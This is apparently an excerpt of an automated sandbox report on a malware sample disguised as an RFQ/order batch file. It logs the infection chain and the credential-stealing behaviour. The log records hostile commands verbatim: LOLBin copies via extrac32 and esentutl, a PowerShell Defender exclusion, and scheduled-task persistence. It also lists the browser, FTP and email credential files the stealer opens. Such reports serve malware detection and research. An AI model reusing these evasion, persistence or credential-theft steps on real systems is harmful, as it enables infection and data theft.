                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 352008
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 290008
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFF65.tmp.cmd""Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02E45ACC
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02E4A7C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02E45BD8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_02E4A810
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,32_2_02EE5ACC
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,32_2_02EE5BD7
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: GetLocaleInfoA,32_2_02EEA810
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E4920C GetLocalTime,4_2_02E4920C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E4B78C GetVersionExA,4_2_02E4B78C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                      Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1624352397.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.3790934046.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1624352397.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 6424, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
